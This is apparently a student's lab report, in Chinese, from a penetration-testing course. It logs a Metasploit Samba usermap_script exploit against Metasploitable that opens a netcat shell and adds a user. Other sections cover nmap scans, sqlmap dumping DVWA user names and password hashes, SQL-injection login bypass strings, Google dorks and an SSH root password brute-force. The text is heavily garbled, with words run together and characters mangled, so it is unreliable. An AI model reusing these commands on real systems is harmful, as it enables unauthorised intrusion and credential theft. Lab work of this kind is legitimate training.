【報(bào)告】滲透測試實(shí)驗(yàn)報(bào)告

1、滲透測試培訓(xùn)3 月 13 日第一天：主要試驗(yàn)總結(jié)第一利用 struts2 漏洞，可以直接執(zhí)行任意命令，取得主機(jī)掌握權(quán)；試驗(yàn)環(huán)境：kali linux 作為攻擊工具；owasp 作為靶機(jī)2003 metaspoitable實(shí)現(xiàn)能夠勝利拜訪使用 metaspliot完成對于靶機(jī) samba 服務(wù)的攻擊，獵取shell 權(quán)限search samba查找模塊use multi/samba/usemap_script挑選滲透攻擊模塊show payloads查看與該滲透模塊相兼容的攻擊載荷set payload cmd/unix/bind_netcat挑選 netcat 工具在滲透攻擊勝利后執(zhí)行shel

2、l show options查看需要設(shè)置的參數(shù)set rhost 54 設(shè)置主機(jī)攻擊主機(jī)exploit 啟動(dòng)攻擊1、第一安裝 vm 虛擬機(jī)程序，開啟kali， owasp 和 metaspoitalbe 等工具和搭建環(huán)境，使得網(wǎng)絡(luò)可達(dá)，網(wǎng)絡(luò)配置上挑選 nat 模式，地址范疇為/242、開啟 kali 虛機(jī)，進(jìn)入 root 模式，第一進(jìn)入 msfconsle，修改初始密碼為123456 msf passwd* exec: passwd輸入新的 unix 密碼：重新輸入新的unix 密碼：passwd：已勝利更新密碼然后查找 samba 模塊msf sear

3、ch sambamatching modules=namedisclosure daterankdescriptionauxiliary/admin/smb/samba_symlink_traversalnormalsamba symlink directory traversalauxiliary/dos/samba/lsa_addprivs_heapnormalsambalsa_io_privilege_set heap overflowauxiliary/dos/samba/lsa_transnames_heapnormalsamba lsa_io_trans_names heap ov

4、erflowauxiliary/dos/samba/read_nttrans_ea_listnormalsamba read_nttrans_ea_list integer overflowexploit/freebsd/samba/trans2open2003-04-07greatsamba trans2open overflow *bsd x86exploit/linux/samba/chain_reply2021-06-16goodsamba chain_reply memory corruption linux x86exploit/linux/samba/lsa_transnames

5、_heap2007-05-14goodsamba lsa_io_trans_names heap overflowexploit/linux/samba/setinfopolicy_heap2021-04-10normalsambasetinformationpolicy auditeventsinfo heap overflowexploit/linux/samba/trans2open2003-04-07greatsamba trans2open overflow linux x86exploit/multi/samba/nttrans2003-04-07averagesamba 2.2.

6、2- 2.2.6 nttrans buffer overflowexploit/multi/samba/usermap_script2007-05-14excellentsamba usernamemap script command executionexploit/osx/samba/lsa_transnames_heap2007-05-14averagesamba lsa_io_trans_names heap overflowexploit/osx/samba/trans2open2003-04-07greatsamba trans2open overflow mac os x ppc

7、exploit/solaris/samba/lsa_transnames_heap2007-05-14averagesambalsa_io_trans_names heap overflowexploit/solaris/samba/trans2open2003-04-07greatsambatrans2open overflow solaris sparcexploit/unix/misc/distcc_exec2002-02-01excellentdistcc daemoncommand executionexploit/unix/webapp/citrix_access_gateway_

8、exec2021-12-21excellentcitrixaccess gateway command executionexploit/windows/http/sambar6_search_results2003-06-21normalsambar6search results buffer overflowexploit/windows/license/calicclnt_getconfig2005-03-02averagecomputerassociates license client getconfig overflowpost/linux/gather/enum_configsn

9、ormallinuxgather configurationsmsf use multi/samba/usermap_script挑選滲透攻擊模塊msf exploitusermap_script show payloads查看與該滲透模塊相兼容的攻擊載荷compatible payloads=namedisclosure daterankdescriptioncmd/unix/bind_awknormalunix command shell, bind tcp via awkcmd/unix/bind_inetdnormalunix command shell, bind tcp inetd

10、cmd/unix/bind_luanormalunix command shell, bind tcp via luacmd/unix/bind_netcatnormalunix commandshell, bind tcp via netcatcmd/unix/bind_netcat_gapingnormalunix commandshell, bind tcp via netcat -ecmd/unix/bind_netcat_gaping_ipv6normalunixcommand shell, bind tcp via netcat -e ipv6cmd/unix/bind_perln

11、ormalunix command shell, bind tcp via perlcmd/unix/bind_perl_ipv6normalunix command shell, bind tcp via perlipv6cmd/unix/bind_rubynormalunix command shell, bind tcp via rubycmd/unix/bind_ruby_ipv6normalunixcommand shell, bind tcp via ruby ipv6cmd/unix/bind_zshnormalunix command shell, bind tcp via z

12、shcmd/unix/genericnormalunix command,generic command executioncmd/unix/reversenormalunix command shell, double reverse tcp telnetcmd/unix/reverse_awknormalunix command shell, reverse tcp viaawkcmd/unix/reverse_luanormalunix command shell, reverse tcp via luacmd/unix/reverse_netcatnormalunix command

13、shell, reverse tcp via netcatcmd/unix/reverse_netcat_gapingnormalunix command shell, reverse tcp via netcat -ecmd/unix/reverse_opensslnormalunix command shell, doublereverse tcp ssl opensslcmd/unix/reverse_perlnormalunix command shell, reverse tcp via perlcmd/unix/reverse_perl_sslnormalunix commands

14、hell, reverse tcp sslvia perlcmd/unix/reverse_php_sslnormalunix command shell, reverse tcp ssl via phpcmd/unix/reverse_pythonnormalunix command shell, reverse tcp via pythoncmd/unix/reverse_python_sslnormalunix command shell, reverse tcp sslvia pythoncmd/unix/reverse_rubynormalunix command shell, re

15、verse tcp via rubycmd/unix/reverse_ruby_sslnormalunix command shell, reverse tcp sslvia rubycmd/unix/reverse_ssl_double_telnetnormalunix command shell, double reverse tcp ssl telnetcmd/unix/reverse_zshnormalunix commandshell, reverse tcp via zshmsf exploitusermap_script set payload cmd/unix/bind_net

16、cat挑選 netcat 工具在滲透攻擊勝利后執(zhí)行shell payload = cmd/unix/bind_netcatmsf exploitusermap_script show options查看需要設(shè)置的參數(shù)msf exploitusermap_script set rhost 54 設(shè)置主機(jī)攻擊主機(jī)rhost = 54msf exploitusermap_script exploit啟動(dòng)攻擊* started bind handler* command shell session 1 opened 28:56558 - 10

17、.10.10.254:4444 at 2021-03-13 16:06:40 +0800已經(jīng)取得 54 機(jī)子的掌握權(quán)，可以增加用戶useradd test用戶增加勝利& 存活探測 -pu -sn udp ping 不列服務(wù)， -pn 不適用 pingnmap -ss -pn xx.xx.xx.xx tcp syn掃描 不發(fā)送 icmp namp -sv -pn xx.xx.xx.xx列出服務(wù)具體信息namp -po -script=smb-check-vulns xx.xx.xx.xx查找 ms-08067 漏洞&nmap 網(wǎng)站掃描msf nmapmsf nmap -sv

18、-pn 54 * exec: nmap -sv -pn 54starting nmap 6.46 at 2021-03-13 16:38 cst nmap scan report for 54host is up 0.00020s latency.all 1000 scanned ports on 54 are filtered mac address: 00:50:56:e7:1b:31 vmwareservice detection performed. please report any incorrect

19、results at.nmap done: 1 ip address 1 host up scanned in 22.84 secondsmsf nmap -po -script=smb-check-vulns 54 * exec: nmap -po -script=smb-check-vulns 54starting nmap 6.46 at 2021-03-13 16:47 cst nmap scan report for 54host is up 0.00021s latency.all 1000 scanned ports o

20、n 54 are filtered mac address: 00:50:56:e7:1b:31 vmwaremap done: 1 ip address 1 host up scanned in 23.06 seconds%msf nmap -o * exec: nmap -ostarting nmap 6.46 at 2021-03-13 17:16 cst nmap scan report for32host is up 0.0054s latency.not shown: 999 filtered ports portstate servic

21、e80/tcp openhttpwarning: osscan results may be unreliable because we could not find at least 1 open and 1 closed portaggressive os guesses: brother mfc-7820n printer 94%, digi connect me serial-to-ethernet bridge 94%, netgear sc101 storage central nas device 91%, shoretel shoregear-t1 voip switch 91

22、%, aastra 480i ip phone or sun remote system control rsc 91%, aastra 6731i voip phone or apple airport express wap 91%, cisco wireless ip phone 7920-etsi 91%, gopro hero3 camera 91%, konica minoltabizhub250 printer91%, linux 2.4.26slackware 10.0.0 86%no exact os matches for host test conditions non-

23、ideal.os detection performed. please report any incorrect results at. nmap done: 1 ip address 1 host up scanned in 57.88 secondsmsf use auxiliary/scanner/http/dir_scanner msf auxiliarydir_scanner set threads 50 threads = 50msf auxiliarydir_scanner set rhostsrhosts =msf auxiliarydir_scanner run* dete

24、cting error code * detecting error code* scanned 2 of 2 hosts 100% complete * auxiliary module execution completedsqlmap 檢查 sql 注入的漏洞rootkali:# sqlmaprootkali:# sqlmap -u -cookie=security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23帶 cookie 的方式查出這個(gè)網(wǎng)站數(shù)據(jù)庫的用戶和密碼sqlmap/1.0-dev - automatic sql injection and

25、 database takeover tool. legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. it is the end users responsibilityto obey all applicable local, state and federallaws. developers assume no liabilityand are not responsible for any misuse or damage caused by th

26、is program* starting at 11:50:2011:50:20 info testing connection to the target url11:50:20 info testing if the target url is stable. this can take a couple of seconds 11:50:21 info target url is stable11:50:21 info testing if get parameter id is dynamic11:50:21 info confirming that get parameter id

27、is dynamic 11:50:21 info get parameter id is dynamic11:50:21 info heuristics detected web page charset ascii11:50:21 info heuristic basic test shows that get parameter id might be injectable possible dbms: mysql 11:50:21 info testing for sql injection on get parameter idheuristic parsing test showed

28、 that the back-end dbms could be mysql. do you want to skip test payloads specific for other dbmses. y/n ydo you want to include all tests for mysql extending provided level 1 and risk 1. y/n y11:50:25 info testing and boolean-based blind - where or having clause 11:50:25 warning reflective values f

29、ound and filtering out11:50:25 info get parameter id seems to be and boolean-based blind - where or having clause injectable 11:50:25 info testing mysql = 5.0 and error-based - where or having clause11:50:25 info get parameter id is mysql = 5.0 and error-based - where or having clause injectable 11:

30、50:25 info testing mysql inline queries11:50:25 info testing mysql 5.0.11 stacked queries11:50:25 warning time-based comparison requires larger statistical model, please wait.11:50:25 info testing mysql 5.0.11 and time-based blind11:50:36 info get parameter id seems to be mysql 5.0.11 and time-based

31、 blind injectable11:50:36 info testing mysql union query null - 1 to 20 columns11:50:36 info automatically extending ranges for union query injection technique tests as there is at least one other potential technique found11:50:36 info order by technique seems to be usable. this should reduce the ti

32、me needed to find the right number of query columns. automatically extending the range for current union query injection technique test 11:50:36 info target url appears to have 2 columns in query11:50:36 info get parameter id is mysql union query null - 1 to 20 columns injectable get parameter id is

33、 vulnerable. do you want to keep testing the others if any. y/n nsqlmap identified the following injection points with a total of 41 https requests:-place: get parameter: idtype: boolean-based blindtitle: and boolean-based blind - where or having clause payload: id=1 and 4334=4334 and iasx=iasx&subm

34、it=submittype: error-basedtitle: mysql = 5.0 and error-based - where or having clausepayload: id=1 and select4941 fromselectcount*,concat0x71626e6f71,selectcase when 4941=4941then1else 0end,0x7163716271,floorrand0*2xfrom information_schema.character_sets group by xa and zahu=zahu&submit=submittype:

35、union querytitle: mysql union query null - 2 columnspayload:id=1unionallselect null,concat0x71626e6f71,0x4b4977451,0x7163716271#&submit=submit-type: and/or time-based blindtitle: mysql 5.0.11 and time-based blindpayload: id=1 and sleep5 and xfnp=xfnp&submit=submit11:50:40 info the back-end dbms is m

36、ysqlweb server operating system: linux ubuntu 10.04 lucid lynx web application technology: php 5.3.2, apache 2.2.14back-end dbms: mysql 5.011:50:40 info fetched data logged to text files under /usr/share/sqlmap/output/29 * shutting down at 11:50:40rootkali:# sqlmap -u -cookie=security=low;

37、 phpsessid=lu1d2nfdvfkgkc8fa628c0vh23-p id -dbs可以看出返回?cái)?shù)據(jù)庫為：11:53:32 warning reflective values found and filtering out available databases 2:* dvwa* information_schemarootkali:# sqlmap -u -cookie=security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23-p id -d dvwa -tables查看 dvwa 數(shù)據(jù)庫database: dvwa 2 tables+

38、-+| guestbook | users|+-+rootkali:# sqlmap -u -cookie=security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23-p id -d dvwa -t users-columnsdatabase: dvwa table: users6 columns+-+-+| column| type|+-+-+| user| varchar15 | avatar| varchar70 | first_name | varchar15 | last_name| varchar15 | password| varchar

39、32 | user_id| int6|+-+-+rootkali:# sqlmap -u -cookie=security=low; phpsessid=lu1d2nfdvfkgkc8fa628c0vh23-p id -d dvwa -t users-c user,password -dump database: dvwatable: users5 entries+-+-+| user| password|+-+-+| 1337| 8d3533d75ae2c3966d7e0d4fcc69216b charley | admin| 21232f297a57a5a743894a0e4a801fc3

40、 admin| gordonb | e99a18c428cb38d5f260853678922e03 abc123| pablo| 0d107d09f5bbe40cade3de5c71e9e9b7| smithy| 5f4dcc3b5aa765d61d8327deb882cf99|+-+-+可以看出用戶名為admin密碼是 admin勝利2day&情報(bào)收集whois 域名注冊信息查詢；目標(biāo)：netcraft 網(wǎng)站供應(yīng)的信息查詢，查詢網(wǎng)站宿主，站點(diǎn)排名，操作系統(tǒng) t查詢網(wǎng)站 旁注技術(shù)，主站沒問題，可以看一下同服務(wù)器上其他的網(wǎng)站ip2domain 反查詢網(wǎng)站1、google hacking 2、目

41、錄結(jié)構(gòu)parent directory site ： /xxxxinc:網(wǎng)站培植信息，數(shù)據(jù)庫口令等；bak:備份文件； txt or sql 數(shù)據(jù)結(jié)構(gòu)等use auxiliary/scanner/http/dir_scanner set threads 50 設(shè)置進(jìn)程set rhosts xxxx設(shè)置目標(biāo)設(shè)置完成后進(jìn)行 runexploitrobots.txt 告知搜尋引擎那些目錄是敏銳文件&3、檢索特定類型文件site:xxxx.4、搜尋易存在sql注入點(diǎn)的頁面site:xxx inurl:login登陸界面里面在隨機(jī)用戶后面加個(gè)引號，引發(fā)數(shù)據(jù)庫錯(cuò)誤，然后可以發(fā)覺數(shù)據(jù)庫查詢的格式select

42、 from usersusername=xx and password=xxadmin or1 admin or1select fromusers username=adminadminor 1=1-密碼就任憑輸入數(shù)字即可網(wǎng)站上頁面上加一個(gè)引號 假如存在注入就會(huì)顯現(xiàn)數(shù)據(jù)庫報(bào)錯(cuò)，否就就是頁面沒有變化仍有一種方式就是再后面加and 1=1 或者 1=2，都會(huì)報(bào)錯(cuò)，仍有a=aadminor 1=1-進(jìn)去 sqlmap sqlmap -u sqlmap -u http:/rootkali:# sqlmap sqlmap -u url -cookie=-p id -d-t主機(jī)探測與端口掃描活躍主機(jī)掃描u

43、se ausiliary/scanner/discovery/arp_sweep set rhosts 2-130set threads 50run2、nmap服務(wù)掃描與查點(diǎn)1、metasploit 的 scanner 幫助模塊中，有許多用于服務(wù)掃描和查點(diǎn)的工具，這些工具常以service namelogin命名search name:version 2、ssh查點(diǎn)use auxiliary/scanner/ssh/ssh_versionset rhosts xxxx set threads 100run & ssh 查點(diǎn)試驗(yàn)：rootkali:# msfconsolems

44、f use auxiliary/scanner/ssh/ssh_version msf auxiliaryssh_version show optionsmodule options auxiliary/scanner/ssh/ssh_version:namecurrent settingrequireddescriptionrhosts rport22yes yesthe target address range or cidr identifier the target portthreads1yesthe number of concurrent threadstimeout30yest

45、imeout for the ssh probemsf auxiliaryssh_version set rhosts 29 rhosts = 29msf auxiliaryssh_version set threads 100 threads = 100msf auxiliaryssh_version run* 29:22, ssh server version: ssh-2.0-openssh_5.3p1 debian-3ubuntu4 * scanned 1 of 1 hosts 100% complete* auxiliary

46、 module execution completed&口令猜解地址可以是地址段或單ip 或地質(zhì)區(qū)段 user msfconsole 里面use auxiliary/scanner/ssh/ssh_login set rhosts 0set username root set pass_set threas 100runvi一個(gè)密碼文件口令嗅探set auxiliary/sniffer/psnuffle & 口令猜解試驗(yàn)：msf use auxiliary/scanner/ssh/ssh_login msf auxiliaryssh_login show option

47、smodule options auxiliary/scanner/ssh/ssh_login:namecurrent settingrequireddescriptionblank_passwordsfalsenotry blank passwords for all usersbruteforce_speed5yeshow fast to bruteforce, from 0 to 5db_all_credsfalsenotry each user/passwordcouple storedin thecurrentdatabasedb_all_passdb_all_usersfalsef

48、alsenonoadd all passwords in the current database to the listadd all users in the current database to the listpassword pass_filenonoa specific password to authenticate with passwords, one per linerhostsyesthe target address range or cidr identifierrport22yesthe target portlinestop_on_success falseye

49、sstop guessing when a credential works for a host threads1yesthe number of concurrent threadsusernamenoa specific username to authenticate as userpass_filenousers and passwords separated by space, one pair peruser_as_passfalsenotry the username as the password for all users user_filenousernames, one

50、 per lineverbosetrueyeswhether to print output for all attemptsmsf auxiliaryssh_login set username root username = rootmsf auxiliaryssh_login setpass_file / root/ passwd:/ 在 root 根目錄下創(chuàng)建一個(gè)密碼文件,名字叫 passwdpass_file = root passwdmsf auxiliaryssh_login set threads 50 threads = 50msf auxiliaryssh_login set rhosts 29 rhosts = 29msf auxiliaryssh_login run* 29:22 ssh - starting bruteforce* 29:22 ssh - 1/3 - trying: username: root with password: ahbieid - 10.10.1